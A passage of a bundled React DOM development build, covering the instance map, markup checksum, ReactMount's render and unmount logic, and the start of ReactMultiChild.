maintains a mapping from a public facing stateful\n * instance (key) and the internal representation (value). This allows public\n * methods to accept the user facing instance as an argument and map them back\n * to internal methods.\n */\n\n// TODO: Replace this with ES6: var ReactInstanceMap = new Map();\n\nvar ReactInstanceMap = {\n  /**\n   * This API should be called `delete` but we'd have to make sure to always\n   * transform these to strings for IE support. When this transform is fully\n   * supported we can rename it.\n   */\n  remove: function (key) {\n    key._reactInternalInstance = undefined;\n  },\n\n  get: function (key) {\n    return key._reactInternalInstance;\n  },\n\n  has: function (key) {\n    return key._reactInternalInstance !== undefined;\n  },\n\n  set: function (key, value) {\n    key._reactInternalInstance = value;\n  }\n};\n\nmodule.exports = ReactInstanceMap;\n},{}],64:[function(_dereq_,module,exports){\n/**\n * Copyright 2016-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\n// Trust the developer to only use ReactInstrumentation with a __DEV__ check\n\nvar debugTool = null;\n\nif (\"development\" !== 'production') {\n  var ReactDebugTool = _dereq_(50);\n  debugTool = ReactDebugTool;\n}\n\nmodule.exports = { debugTool: debugTool };\n},{\"50\":50}],65:[function(_dereq_,module,exports){\n/**\n * Copyright 2016-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar warning = _dereq_(159);\n\nif (\"development\" !== 'production') {\n  var processingChildContext = false;\n\n  var warnInvalidSetState = function () {\n    \"development\" !== 'production' ? warning(!processingChildContext, 'setState(...): Cannot call setState() inside getChildContext()') : void 0;\n  };\n}\n\nvar ReactInvalidSetStateWarningHook = {\n  onBeginProcessingChildContext: function () {\n    processingChildContext = true;\n  },\n  onEndProcessingChildContext: function () {\n    processingChildContext = false;\n  },\n  onSetState: function () {\n    warnInvalidSetState();\n  }\n};\n\nmodule.exports = ReactInvalidSetStateWarningHook;\n},{\"159\":159}],66:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar adler32 = _dereq_(103);\n\nvar TAG_END = /\\/?>/;\nvar COMMENT_START = /^<\\!\\-\\-/;\n\nvar ReactMarkupChecksum = {\n  CHECKSUM_ATTR_NAME: 'data-react-checksum',\n\n  /**\n   * @param {string} markup Markup string\n   * @return {string} Markup string with checksum attribute attached\n   */\n  addChecksumToMarkup: function (markup) {\n    var checksum = adler32(markup);\n\n    // Add checksum (handle both parent tags, comments and self-closing tags)\n    if (COMMENT_START.test(markup)) {\n      return markup;\n    } else {\n      return markup.replace(TAG_END, ' ' + ReactMarkupChecksum.CHECKSUM_ATTR_NAME + '=\"' + checksum + '\"$&');\n    }\n  },\n\n  /**\n   * @param {string} markup to use\n   * @param {DOMElement} element root React element\n   * @returns {boolean} whether or not the markup is the same\n   */\n  canReuseMarkup: function (markup, element) {\n    var existingChecksum = element.getAttribute(ReactMarkupChecksum.CHECKSUM_ATTR_NAME);\n    existingChecksum = existingChecksum && parseInt(existingChecksum, 10);\n    var markupChecksum = adler32(markup);\n    return markupChecksum === existingChecksum;\n  }\n};\n\nmodule.exports = ReactMarkupChecksum;\n},{\"103\":103}],67:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar DOMLazyTree = _dereq_(9);\nvar DOMProperty = _dereq_(11);\nvar React = _dereq_(135);\nvar ReactBrowserEventEmitter = _dereq_(26);\nvar ReactCurrentOwner = _dereq_(134);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactDOMContainerInfo = _dereq_(35);\nvar ReactDOMFeatureFlags = _dereq_(37);\nvar ReactFeatureFlags = _dereq_(58);\nvar ReactInstanceMap = _dereq_(63);\nvar ReactInstrumentation = _dereq_(64);\nvar ReactMarkupChecksum = _dereq_(66);\nvar ReactReconciler = _dereq_(75);\nvar ReactUpdateQueue = _dereq_(81);\nvar ReactUpdates = _dereq_(82);\n\nvar emptyObject = _dereq_(145);\nvar instantiateReactComponent = _dereq_(121);\nvar invariant = _dereq_(152);\nvar setInnerHTML = _dereq_(128);\nvar shouldUpdateReactComponent = _dereq_(130);\nvar warning = _dereq_(159);\n\nvar ATTR_NAME = DOMProperty.ID_ATTRIBUTE_NAME;\nvar ROOT_ATTR_NAME = DOMProperty.ROOT_ATTRIBUTE_NAME;\n\nvar ELEMENT_NODE_TYPE = 1;\nvar DOC_NODE_TYPE = 9;\nvar DOCUMENT_FRAGMENT_NODE_TYPE = 11;\n\nvar instancesByReactRootID = {};\n\n/**\n * Finds the index of the first character\n * that's not common between the two given strings.\n *\n * @return {number} the index of the character where the strings diverge\n */\nfunction firstDifferenceIndex(string1, string2) {\n  var minLen = Math.min(string1.length, string2.length);\n  for (var i = 0; i < minLen; i++) {\n    if (string1.charAt(i) !== string2.charAt(i)) {\n      return i;\n    }\n  }\n  return string1.length === string2.length ? -1 : minLen;\n}\n\n/**\n * @param {DOMElement|DOMDocument} container DOM element that may contain\n * a React component\n * @return {?*} DOM element that may have the reactRoot ID, or null.\n */\nfunction getReactRootElementInContainer(container) {\n  if (!container) {\n    return null;\n  }\n\n  if (container.nodeType === DOC_NODE_TYPE) {\n    return container.documentElement;\n  } else {\n    return container.firstChild;\n  }\n}\n\nfunction internalGetID(node) {\n  // If node is something like a window, document, or text node, none of\n  // which support attributes or a .getAttribute method, gracefully return\n  // the empty string, as if the attribute were missing.\n  return node.getAttribute && node.getAttribute(ATTR_NAME) || '';\n}\n\n/**\n * Mounts this component and inserts it into the DOM.\n *\n * @param {ReactComponent} componentInstance The instance to mount.\n * @param {DOMElement} container DOM element to mount into.\n * @param {ReactReconcileTransaction} transaction\n * @param {boolean} shouldReuseMarkup If true, do not insert markup\n */\nfunction mountComponentIntoNode(wrapperInstance, container, transaction, shouldReuseMarkup, context) {\n  var markerName;\n  if (ReactFeatureFlags.logTopLevelRenders) {\n    var wrappedElement = wrapperInstance._currentElement.props.child;\n    var type = wrappedElement.type;\n    markerName = 'React mount: ' + (typeof type === 'string' ? type : type.displayName || type.name);\n    console.time(markerName);\n  }\n\n  var markup = ReactReconciler.mountComponent(wrapperInstance, transaction, null, ReactDOMContainerInfo(wrapperInstance, container), context, 0 /* parentDebugID */\n  );\n\n  if (markerName) {\n    console.timeEnd(markerName);\n  }\n\n  wrapperInstance._renderedComponent._topLevelWrapper = wrapperInstance;\n  ReactMount._mountImageIntoNode(markup, container, wrapperInstance, shouldReuseMarkup, transaction);\n}\n\n/**\n * Batched mount.\n *\n * @param {ReactComponent} componentInstance The instance to mount.\n * @param {DOMElement} container DOM element to mount into.\n * @param {boolean} shouldReuseMarkup If true, do not insert markup\n */\nfunction batchedMountComponentIntoNode(componentInstance, container, shouldReuseMarkup, context) {\n  var transaction = ReactUpdates.ReactReconcileTransaction.getPooled(\n  /* useCreateElement */\n  !shouldReuseMarkup && ReactDOMFeatureFlags.useCreateElement);\n  transaction.perform(mountComponentIntoNode, null, componentInstance, container, transaction, shouldReuseMarkup, context);\n  ReactUpdates.ReactReconcileTransaction.release(transaction);\n}\n\n/**\n * Unmounts a component and removes it from the DOM.\n *\n * @param {ReactComponent} instance React component instance.\n * @param {DOMElement} container DOM element to unmount from.\n * @final\n * @internal\n * @see {ReactMount.unmountComponentAtNode}\n */\nfunction unmountComponentFromNode(instance, container, safely) {\n  if (\"development\" !== 'production') {\n    ReactInstrumentation.debugTool.onBeginFlush();\n  }\n  ReactReconciler.unmountComponent(instance, safely);\n  if (\"development\" !== 'production') {\n    ReactInstrumentation.debugTool.onEndFlush();\n  }\n\n  if (container.nodeType === DOC_NODE_TYPE) {\n    container = container.documentElement;\n  }\n\n  // http://jsperf.com/emptying-a-node\n  while (container.lastChild) {\n    container.removeChild(container.lastChild);\n  }\n}\n\n/**\n * True if the supplied DOM node has a direct React-rendered child that is\n * not a React root element. Useful for warning in `render`,\n * `unmountComponentAtNode`, etc.\n *\n * @param {?DOMElement} node The candidate DOM node.\n * @return {boolean} True if the DOM element contains a direct child that was\n * rendered by React but is not a root element.\n * @internal\n */\nfunction hasNonRootReactChild(container) {\n  var rootEl = getReactRootElementInContainer(container);\n  if (rootEl) {\n    var inst = ReactDOMComponentTree.getInstanceFromNode(rootEl);\n    return !!(inst && inst._hostParent);\n  }\n}\n\n/**\n * True if the supplied DOM node is a React DOM element and\n * it has been rendered by another copy of React.\n *\n * @param {?DOMElement} node The candidate DOM node.\n * @return {boolean} True if the DOM has been rendered by another copy of React\n * @internal\n */\nfunction nodeIsRenderedByOtherInstance(container) {\n  var rootEl = getReactRootElementInContainer(container);\n  return !!(rootEl && isReactNode(rootEl) && !ReactDOMComponentTree.getInstanceFromNode(rootEl));\n}\n\n/**\n * True if the supplied DOM node is a valid node element.\n *\n * @param {?DOMElement} node The candidate DOM node.\n * @return {boolean} True if the DOM is a valid DOM node.\n * @internal\n */\nfunction isValidContainer(node) {\n  return !!(node && (node.nodeType === ELEMENT_NODE_TYPE || node.nodeType === DOC_NODE_TYPE || node.nodeType === DOCUMENT_FRAGMENT_NODE_TYPE));\n}\n\n/**\n * True if the supplied DOM node is a valid React node element.\n *\n * @param {?DOMElement} node The candidate DOM node.\n * @return {boolean} True if the DOM is a valid React DOM node.\n * @internal\n */\nfunction isReactNode(node) {\n  return isValidContainer(node) && (node.hasAttribute(ROOT_ATTR_NAME) || node.hasAttribute(ATTR_NAME));\n}\n\nfunction getHostRootInstanceInContainer(container) {\n  var rootEl = getReactRootElementInContainer(container);\n  var prevHostInstance = rootEl && ReactDOMComponentTree.getInstanceFromNode(rootEl);\n  return prevHostInstance && !prevHostInstance._hostParent ? prevHostInstance : null;\n}\n\nfunction getTopLevelWrapperInContainer(container) {\n  var root = getHostRootInstanceInContainer(container);\n  return root ? root._hostContainerInfo._topLevelWrapper : null;\n}\n\n/**\n * Temporary (?) hack so that we can store all top-level pending updates on\n * composites instead of having to worry about different types of components\n * here.\n */\nvar topLevelRootCounter = 1;\nvar TopLevelWrapper = function () {\n  this.rootID = topLevelRootCounter++;\n};\nTopLevelWrapper.prototype.isReactComponent = {};\nif (\"development\" !== 'production') {\n  TopLevelWrapper.displayName = 'TopLevelWrapper';\n}\nTopLevelWrapper.prototype.render = function () {\n  return this.props.child;\n};\nTopLevelWrapper.isReactTopLevelWrapper = true;\n\n/**\n * Mounting is the process of initializing a React component by creating its\n * representative DOM elements and inserting them into a supplied `container`.\n * Any prior content inside `container` is destroyed in the process.\n *\n *   ReactMount.render(\n *     component,\n *     document.getElementById('container')\n *   );\n *\n *   <div id=\"container\">                   <-- Supplied `container`.\n *     <div data-reactid=\".3\">              <-- Rendered reactRoot of React\n *       // ...                                 component.\n *     </div>\n *   </div>\n *\n * Inside of `container`, the first element rendered is the \"reactRoot\".\n */\nvar ReactMount = {\n  TopLevelWrapper: TopLevelWrapper,\n\n  /**\n   * Used by devtools. The keys are not important.\n   */\n  _instancesByReactRootID: instancesByReactRootID,\n\n  /**\n   * This is a hook provided to support rendering React components while\n   * ensuring that the apparent scroll position of its `container` does not\n   * change.\n   *\n   * @param {DOMElement} container The `container` being rendered into.\n   * @param {function} renderCallback This must be called once to do the render.\n   */\n  scrollMonitor: function (container, renderCallback) {\n    renderCallback();\n  },\n\n  /**\n   * Take a component that's already mounted into the DOM and replace its props\n   * @param {ReactComponent} prevComponent component instance already in the DOM\n   * @param {ReactElement} nextElement component instance to render\n   * @param {DOMElement} container container to render into\n   * @param {?function} callback function triggered on completion\n   */\n  _updateRootComponent: function (prevComponent, nextElement, nextContext, container, callback) {\n    ReactMount.scrollMonitor(container, function () {\n      ReactUpdateQueue.enqueueElementInternal(prevComponent, nextElement, nextContext);\n      if (callback) {\n        ReactUpdateQueue.enqueueCallbackInternal(prevComponent, callback);\n      }\n    });\n\n    return prevComponent;\n  },\n\n  /**\n   * Render a new component into the DOM. Hooked by hooks!\n   *\n   * @param {ReactElement} nextElement element to render\n   * @param {DOMElement} container container to render into\n   * @param {boolean} shouldReuseMarkup if we should skip the markup insertion\n   * @return {ReactComponent} nextComponent\n   */\n  _renderNewRootComponent: function (nextElement, container, shouldReuseMarkup, context) {\n    // Various parts of our code (such as ReactCompositeComponent's\n    // _renderValidatedComponent) assume that calls to render aren't nested;\n    // verify that that's the case.\n    \"development\" !== 'production' ? warning(ReactCurrentOwner.current == null, '_renderNewRootComponent(): Render methods should be a pure function ' + 'of props and state; triggering nested component updates from ' + 'render is not allowed. If necessary, trigger nested updates in ' + 'componentDidUpdate. Check the render method of %s.', ReactCurrentOwner.current && ReactCurrentOwner.current.getName() || 'ReactCompositeComponent') : void 0;\n\n    !isValidContainer(container) ? \"development\" !== 'production' ? invariant(false, '_registerComponent(...): Target container is not a DOM element.') : _prodInvariant('37') : void 0;\n\n    ReactBrowserEventEmitter.ensureScrollValueMonitoring();\n    var componentInstance = instantiateReactComponent(nextElement, false);\n\n    // The initial render is synchronous but any updates that happen during\n    // rendering, in componentWillMount or componentDidMount, will be batched\n    // according to the current batching strategy.\n\n    ReactUpdates.batchedUpdates(batchedMountComponentIntoNode, componentInstance, container, shouldReuseMarkup, context);\n\n    var wrapperID = componentInstance._instance.rootID;\n    instancesByReactRootID[wrapperID] = componentInstance;\n\n    return componentInstance;\n  },\n\n  /**\n   * Renders a React component into the DOM in the supplied `container`.\n   *\n   * If the React component was previously rendered into `container`, this will\n   * perform an update on it and only mutate the DOM as necessary to reflect the\n   * latest React component.\n   *\n   * @param {ReactComponent} parentComponent The conceptual parent of this render tree.\n   * @param {ReactElement} nextElement Component element to render.\n   * @param {DOMElement} container DOM element to render into.\n   * @param {?function} callback function triggered on completion\n   * @return {ReactComponent} Component instance rendered in `container`.\n   */\n  renderSubtreeIntoContainer: function (parentComponent, nextElement, container, callback) {\n    !(parentComponent != null && ReactInstanceMap.has(parentComponent)) ? \"development\" !== 'production' ? invariant(false, 'parentComponent must be a valid React Component') : _prodInvariant('38') : void 0;\n    return ReactMount._renderSubtreeIntoContainer(parentComponent, nextElement, container, callback);\n  },\n\n  _renderSubtreeIntoContainer: function (parentComponent, nextElement, container, callback) {\n    ReactUpdateQueue.validateCallback(callback, 'ReactDOM.render');\n    !React.isValidElement(nextElement) ? \"development\" !== 'production' ? invariant(false, 'ReactDOM.render(): Invalid component element.%s', typeof nextElement === 'string' ? \" Instead of passing a string like 'div', pass \" + \"React.createElement('div') or <div />.\" : typeof nextElement === 'function' ? ' Instead of passing a class like Foo, pass ' + 'React.createElement(Foo) or <Foo />.' : // Check if it quacks like an element\n    nextElement != null && nextElement.props !== undefined ? ' This may be caused by unintentionally loading two independent ' + 'copies of React.' : '') : _prodInvariant('39', typeof nextElement === 'string' ? \" Instead of passing a string like 'div', pass \" + \"React.createElement('div') or <div />.\" : typeof nextElement === 'function' ? ' Instead of passing a class like Foo, pass ' + 'React.createElement(Foo) or <Foo />.' : nextElement != null && nextElement.props !== undefined ? ' This may be caused by unintentionally loading two independent ' + 'copies of React.' : '') : void 0;\n\n    \"development\" !== 'production' ? warning(!container || !container.tagName || container.tagName.toUpperCase() !== 'BODY', 'render(): Rendering components directly into document.body is ' + 'discouraged, since its children are often manipulated by third-party ' + 'scripts and browser extensions. This may lead to subtle ' + 'reconciliation issues. Try rendering into a container element created ' + 'for your app.') : void 0;\n\n    var nextWrappedElement = React.createElement(TopLevelWrapper, {\n      child: nextElement\n    });\n\n    var nextContext;\n    if (parentComponent) {\n      var parentInst = ReactInstanceMap.get(parentComponent);\n      nextContext = parentInst._processChildContext(parentInst._context);\n    } else {\n      nextContext = emptyObject;\n    }\n\n    var prevComponent = getTopLevelWrapperInContainer(container);\n\n    if (prevComponent) {\n      var prevWrappedElement = prevComponent._currentElement;\n      var prevElement = prevWrappedElement.props.child;\n      if (shouldUpdateReactComponent(prevElement, nextElement)) {\n        var publicInst = prevComponent._renderedComponent.getPublicInstance();\n        var updatedCallback = callback && function () {\n          callback.call(publicInst);\n        };\n        ReactMount._updateRootComponent(prevComponent, nextWrappedElement, nextContext, container, updatedCallback);\n        return publicInst;\n      } else {\n        ReactMount.unmountComponentAtNode(container);\n      }\n    }\n\n    var reactRootElement = getReactRootElementInContainer(container);\n    var containerHasReactMarkup = reactRootElement && !!internalGetID(reactRootElement);\n    var containerHasNonRootReactChild = hasNonRootReactChild(container);\n\n    if (\"development\" !== 'production') {\n      \"development\" !== 'production' ? warning(!containerHasNonRootReactChild, 'render(...): Replacing React-rendered children with a new root ' + 'component. If you intended to update the children of this node, ' + 'you should instead have the existing children update their state ' + 'and render the new components instead of calling ReactDOM.render.') : void 0;\n\n      if (!containerHasReactMarkup || reactRootElement.nextSibling) {\n        var rootElementSibling = reactRootElement;\n        while (rootElementSibling) {\n          if (internalGetID(rootElementSibling)) {\n            \"development\" !== 'production' ? warning(false, 'render(): Target node has markup rendered by React, but there ' + 'are unrelated nodes as well. This is most commonly caused by ' + 'white-space inserted around server-rendered markup.') : void 0;\n            break;\n          }\n          rootElementSibling = rootElementSibling.nextSibling;\n        }\n      }\n    }\n\n    var shouldReuseMarkup = containerHasReactMarkup && !prevComponent && !containerHasNonRootReactChild;\n    var component = ReactMount._renderNewRootComponent(nextWrappedElement, container, shouldReuseMarkup, nextContext)._renderedComponent.getPublicInstance();\n    if (callback) {\n      callback.call(component);\n    }\n    return component;\n  },\n\n  /**\n   * Renders a React component into the DOM in the supplied `container`.\n   * See https://facebook.github.io/react/docs/top-level-api.html#reactdom.render\n   *\n   * If the React component was previously rendered into `container`, this will\n   * perform an update on it and only mutate the DOM as necessary to reflect the\n   * latest React component.\n   *\n   * @param {ReactElement} nextElement Component element to render.\n   * @param {DOMElement} container DOM element to render into.\n   * @param {?function} callback function triggered on completion\n   * @return {ReactComponent} Component instance rendered in `container`.\n   */\n  render: function (nextElement, container, callback) {\n    return ReactMount._renderSubtreeIntoContainer(null, nextElement, container, callback);\n  },\n\n  /**\n   * Unmounts and destroys the React component rendered in the `container`.\n   * See https://facebook.github.io/react/docs/top-level-api.html#reactdom.unmountcomponentatnode\n   *\n   * @param {DOMElement} container DOM element containing a React component.\n   * @return {boolean} True if a component was found in and unmounted from\n   *                   `container`\n   */\n  unmountComponentAtNode: function (container) {\n    // Various parts of our code (such as ReactCompositeComponent's\n    // _renderValidatedComponent) assume that calls to render aren't nested;\n    // verify that that's the case. (Strictly speaking, unmounting won't cause a\n    // render but we still don't expect to be in a render call here.)\n    \"development\" !== 'production' ? warning(ReactCurrentOwner.current == null, 'unmountComponentAtNode(): Render methods should be a pure function ' + 'of props and state; triggering nested component updates from render ' + 'is not allowed. If necessary, trigger nested updates in ' + 'componentDidUpdate. Check the render method of %s.', ReactCurrentOwner.current && ReactCurrentOwner.current.getName() || 'ReactCompositeComponent') : void 0;\n\n    !isValidContainer(container) ? \"development\" !== 'production' ? invariant(false, 'unmountComponentAtNode(...): Target container is not a DOM element.') : _prodInvariant('40') : void 0;\n\n    if (\"development\" !== 'production') {\n      \"development\" !== 'production' ? warning(!nodeIsRenderedByOtherInstance(container), \"unmountComponentAtNode(): The node you're attempting to unmount \" + 'was rendered by another copy of React.') : void 0;\n    }\n\n    var prevComponent = getTopLevelWrapperInContainer(container);\n    if (!prevComponent) {\n      // Check if the node being unmounted was rendered by React, but isn't a\n      // root node.\n      var containerHasNonRootReactChild = hasNonRootReactChild(container);\n\n      // Check if the container itself is a React root node.\n      var isContainerReactRoot = container.nodeType === 1 && container.hasAttribute(ROOT_ATTR_NAME);\n\n      if (\"development\" !== 'production') {\n        \"development\" !== 'production' ? warning(!containerHasNonRootReactChild, \"unmountComponentAtNode(): The node you're attempting to unmount \" + 'was rendered by React and is not a top-level container. %s', isContainerReactRoot ? 'You may have accidentally passed in a React root node instead ' + 'of its container.' : 'Instead, have the parent component update its state and ' + 'rerender in order to remove this component.') : void 0;\n      }\n\n      return false;\n    }\n    delete instancesByReactRootID[prevComponent._instance.rootID];\n    ReactUpdates.batchedUpdates(unmountComponentFromNode, prevComponent, container, false);\n    return true;\n  },\n\n  _mountImageIntoNode: function (markup, container, instance, shouldReuseMarkup, transaction) {\n    !isValidContainer(container) ? \"development\" !== 'production' ? invariant(false, 'mountComponentIntoNode(...): Target container is not valid.') : _prodInvariant('41') : void 0;\n\n    if (shouldReuseMarkup) {\n      var rootElement = getReactRootElementInContainer(container);\n      if (ReactMarkupChecksum.canReuseMarkup(markup, rootElement)) {\n        ReactDOMComponentTree.precacheNode(instance, rootElement);\n        return;\n      } else {\n        var checksum = rootElement.getAttribute(ReactMarkupChecksum.CHECKSUM_ATTR_NAME);\n        rootElement.removeAttribute(ReactMarkupChecksum.CHECKSUM_ATTR_NAME);\n\n        var rootMarkup = rootElement.outerHTML;\n        rootElement.setAttribute(ReactMarkupChecksum.CHECKSUM_ATTR_NAME, checksum);\n\n        var normalizedMarkup = markup;\n        if (\"development\" !== 'production') {\n          // because rootMarkup is retrieved from the DOM, various normalizations\n          // will have occurred which will not be present in `markup`. Here,\n          // insert markup into a <div> or <iframe> depending on the container\n          // type to perform the same normalizations before comparing.\n          var normalizer;\n          if (container.nodeType === ELEMENT_NODE_TYPE) {\n            normalizer = document.createElement('div');\n            normalizer.innerHTML = markup;\n            normalizedMarkup = normalizer.innerHTML;\n          } else {\n            normalizer = document.createElement('iframe');\n            document.body.appendChild(normalizer);\n            normalizer.contentDocument.write(markup);\n            normalizedMarkup = normalizer.contentDocument.documentElement.outerHTML;\n            document.body.removeChild(normalizer);\n          }\n        }\n\n        var diffIndex = firstDifferenceIndex(normalizedMarkup, rootMarkup);\n        var difference = ' (client) ' + normalizedMarkup.substring(diffIndex - 20, diffIndex + 20) + '\\n (server) ' + rootMarkup.substring(diffIndex - 20, diffIndex + 20);\n\n        !(container.nodeType !== DOC_NODE_TYPE) ? \"development\" !== 'production' ? invariant(false, 'You\\'re trying to render a component to the document using server rendering but the checksum was invalid. This usually means you rendered a different component type or props on the client from the one on the server, or your render() methods are impure. React cannot handle this case due to cross-browser quirks by rendering at the document root. You should look for environment dependent code in your components and ensure the props are the same client and server side:\\n%s', difference) : _prodInvariant('42', difference) : void 0;\n\n        if (\"development\" !== 'production') {\n          \"development\" !== 'production' ? warning(false, 'React attempted to reuse markup in a container but the ' + 'checksum was invalid. This generally means that you are ' + 'using server rendering and the markup generated on the ' + 'server was not what the client was expecting. React injected ' + 'new markup to compensate which works but you have lost many ' + 'of the benefits of server rendering. Instead, figure out ' + 'why the markup being generated is different on the client ' + 'or server:\\n%s', difference) : void 0;\n        }\n      }\n    }\n\n    !(container.nodeType !== DOC_NODE_TYPE) ? \"development\" !== 'production' ? invariant(false, 'You\\'re trying to render a component to the document but you didn\\'t use server rendering. We can\\'t do this without using server rendering due to cross-browser quirks. See ReactDOMServer.renderToString() for server rendering.') : _prodInvariant('43') : void 0;\n\n    if (transaction.useCreateElement) {\n      while (container.lastChild) {\n        container.removeChild(container.lastChild);\n      }\n      DOMLazyTree.insertTreeBefore(container, markup, null);\n    } else {\n      setInnerHTML(container, markup);\n      ReactDOMComponentTree.precacheNode(instance, container.firstChild);\n    }\n\n    if (\"development\" !== 'production') {\n      var hostNode = ReactDOMComponentTree.getInstanceFromNode(container.firstChild);\n      if (hostNode._debugID !== 0) {\n        ReactInstrumentation.debugTool.onHostOperation({\n          instanceID: hostNode._debugID,\n          type: 'mount',\n          payload: markup.toString()\n        });\n      }\n    }\n  }\n};\n\nmodule.exports = ReactMount;\n},{\"11\":11,\"121\":121,\"126\":126,\"128\":128,\"130\":130,\"134\":134,\"135\":135,\"145\":145,\"152\":152,\"159\":159,\"26\":26,\"34\":34,\"35\":35,\"37\":37,\"58\":58,\"63\":63,\"64\":64,\"66\":66,\"75\":75,\"81\":81,\"82\":82,\"9\":9}],68:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar ReactComponentEnvironment = _dereq_(29);\nvar ReactInstanceMap = _dereq_(63);\nvar ReactInstrumentation = _dereq_(64);\n\nvar ReactCurrentOwner = _dereq_(134);\nvar ReactReconciler = _dereq_(75);\nvar ReactChildReconciler = _dereq_(27);\n\nvar emptyFunction = _dereq_(144);\nvar flattenChildren = _dereq_(109);\nvar invariant = _dereq_(152);\n\n/**\n * Make an update for markup to be rendered and inserted at a supplied index.\n *\n * @param {string} markup Markup that renders into an element.\n * @param {number} toIndex Destination index.\n * @private\n */\nfunction makeInsertMarkup(markup, afterNode, toIndex) {\n  // NOTE: Null values reduce hidden classes.\n  return {\n    type: 'INSERT_MARKUP',\n    content: markup,\n    fromIndex: null,\n    fromNode: null,\n    toIndex: toIndex,\n    afterNode: afterNode\n  };\n}\n\n/**\n * Make an update for moving an existing element to another index.\n *\n * @param {number} fromIndex Source index of the existing element.\n * @param {number} toIndex Destination index of the element.\n * @private\n */\nfunction makeMove(child, afterNode, toIndex) {\n  // NOTE: Null values reduce hidden classes.\n  return {\n    type: 'MOVE_EXISTING',\n    content: null,\n    fromIndex: child._mountIndex,\n    fromNode: ReactReconciler.getHostNode(child),\n    toIndex: toIndex,\n    afterNode: afterNode\n  };\n}\n\n/**\n * Make an update for removing an element at an index.\n *\n * @param {number} fromIndex Index of the element to remove.\n * @private\n */\nfunction makeRemove(child, node) {\n  // NOTE: Null values reduce hidden classes.\n  return {\n    type: 'REMOVE_NODE',\n    content: null,\n    fromIndex: child._mountIndex,\n    fromNode: node,\n    toIndex: null,\n    afterNode: null\n  };\n}\n\n/**\n * Make an update for setting the markup of a node.\n *\n * @param {string} markup Markup that renders into an element.\n * @private\n */\nfunction makeSetMarkup(markup) {\n  // NOTE: Null values reduce hidden classes.\n  return {\n    type: 'SET_MARKUP',\n    content: markup,\n    fromIndex: null,\n    fromNode: null,\n    toIndex: null,\n    afterNode: null\n  };\n}\n\n/**\n * Make an update for setting the text content.\n *\n * @param {string} textContent Text content to set.\n * @private\n */\nfunction makeTextContent(textContent) {\n  // NOTE: Null values reduce hidden classes.\n  return {\n    type: 'TEXT_CONTENT',\n    content: textContent,\n    fromIndex: null,\n    fromNode: null,\n    toIndex: null,\n    afterNode: null\n  };\n}\n\n/**\n * Push an update, if any, onto the queue. Creates a new queue if none is\n * passed and always returns the queue. Mutative.\n */\nfunction enqueue(queue, update) {\n  if (update) {\n    queue = queue || [];\n    queue.push(update);\n  }\n  return queue;\n}\n\n/**\n * Processes any enqueued updates.\n *\n * @private\n */\nfunction processQueue(inst, updateQueue) {\n  ReactComponentEnvironment.processChildrenUpdates(inst, updateQueue);\n}\n\nvar setChildrenForInstrumentation = emptyFunction;\nif (\"development\" !== 'production') {\n  var getDebugID = function (inst) {\n    if (!inst._debugID) {\n      // Check for ART-like instances. TODO: This is silly/gross.\n      var internal;\n      if (internal = ReactInstanceMap.get(inst)) {\n        inst = internal;\n      }\n    }\n    return inst._debugID;\n  };\n  setChildrenForInstrumentation = function (children) {\n    var debugID = getDebugID(this);\n    // TODO: React Native empty components are also multichild.\n    // This means they still get into this method but don't have _debugID.\n    if (debugID !== 0) {\n      ReactInstrumentation.debugTool.onSetChildren(debugID, children ? Object.keys(children).map(function (key) {\n        return children[key]._debugID;\n      }) : []);\n    }\n  };\n}\n\n/**\n * ReactMultiChild are capable of reconciling multiple children.\n *\n * @class ReactMultiChild\n * @internal\n */\nvar ReactMultiChild = {\n  /**\n   * Provides common functionality for components that must reconcile multiple\n   * children. This is used by `ReactDOMComponent` to mount, update, and\n   * unmount child components.\n   *\n   * @lends {ReactMultiChild.prototype}\n   */\n  Mixin: {\n    _reconcilerInstantiateChildren: function (nestedChildren, transaction, context) {\n      if (\"development\" !== 'production') {\n        var selfDebugID = getDebugID(this);\n        if (this._currentElement) {\n          try {\n            ReactCurrentOwner.current = this._currentElement._owner;\n            return ReactChildReconciler.instantiateChildren(nestedChildren, transaction, context, selfDebugID);\n          } finally {\n            ReactCurrentOwner.current = null;\n          }\n        }\n      }\n      return ReactChildReconciler.instantiateChildren(nestedChildren, transaction, context);\n    },\n\n    _reconcilerUpdateChildren: function (prevChildren, nextNestedChildrenElements, mountImages, removedNodes, transaction, context) {\n      var nextChildren;\n      var selfDebugID = 0;\n      if (\"development\" !== 'production') {\n        selfDebugID = getDebugID(this);\n        if (this._currentElement) {\n          try {\n            ReactCurrentOwner.current = this._currentElement._owner;\n            nextChildren = flattenChildren(nextNestedChildrenElements, selfDebugID);\n          } finally {\n            ReactCurrentOwner.current = null;\n          }\n          ReactChildReconciler.updateChildren(prevChildren, nextChildren, mountImages, removedNodes, transaction, this, this._hostContainerInfo, context, selfDebugID);\n          return nextChildren;\n        }\n      }\n      nextChildren = flattenChildren(nextNestedChildrenElements, selfDebugID);\n      ReactChildReconciler.updateChildren(prevChildren, nextChildren, mountImages, removedNodes, transaction, this, this._hostContainerInfo, context, selfDebugID);\n      return nextChildren;\n    },\n\n    /**\n     * Generates a \"mount image\" for each of the supplied children. In the case\n     * of `ReactDOMComponent`, a mount image is a string of markup.\n     *\n     * @param {?object} nestedChildren Nested child 